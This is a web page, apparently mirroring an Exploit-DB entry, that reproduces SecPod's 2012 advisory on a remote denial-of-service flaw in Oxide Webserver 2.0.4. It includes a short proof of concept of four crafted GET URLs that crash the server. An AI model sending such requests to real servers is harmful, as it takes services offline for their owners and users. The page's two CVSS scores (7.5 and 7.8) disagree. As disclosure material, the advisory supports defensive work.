header-logo
Suggest Exploit
vendor:
Oxide Webserver
by:
Antu Sanadi
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Oxide Webserver
Affected Version From: Oxide Webserver version 2.0.4 and prior.
Affected Version To: Oxide Webserver version 2.0.4 and prior.
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2012

Oxide Webserver Remote Denial of Service Vulnerability

Oxide Webserver v2.0.4 is prone to a remote Denial of Service vulnerability as it fails to handle crafted requests from the client properly.

Mitigation:

Not available
Source

Exploit-DB raw data:

##############################################################################
#
# Title    : Oxide Webserver Remote Denial of Service Vulnerability
# Author   : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor   : http://sourceforge.net/projects/oxide/
# Advisory : http://secpod.org/blog/?p=516
#	   : http://secpod.org/advisories/SecPod_Oxide_WebServer_DoS_Vuln.txt
# Software : Oxide Webserver v2.0.4 and prior.
# Date     : 29/06/2012
#
###############################################################################

SecPod ID: 1043                                    24/01/2012 Issue Discovered
                                                   19/06/2012 Vendor Notified
	                                           No Response from vendor
                                                   18/07/2012 Advisory Released


Class: Denial of Service                           Severity: High


Overview:
---------
Oxide Webserver v2.0.4 is prone to a remote Denial of Service vulnerability
as it fails to handle crafted requests from the client properly.


Technical Description:
----------------------
The vulnerability is caused by an error in handling some crafted characters
in HTTP GET requests, which causes the server to crash.


Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.


Affected Software:
------------------
Oxide Webserver version 2.0.4 and prior.


Tested on,
Oxide Webserver version 2.0.4 on Windows XP SP3


References:
-----------
http://secpod.org/blog/?p=516
http://sourceforge.net/projects/oxide
http://sourceforge.net/projects/oxide-ws/files
http://secpod.org/advisories/SecPod_Oxide_WebServer_DoS_Vuln.txt


Proof of Concept:
----------------
http://www.example.com:80/?.
http://www.example.com:80/<.
http://www.example.com:80/$.
http://www.example.com:80/cc.


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = COMPLETE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

Navigation

Suggest Exploit

Services By CQR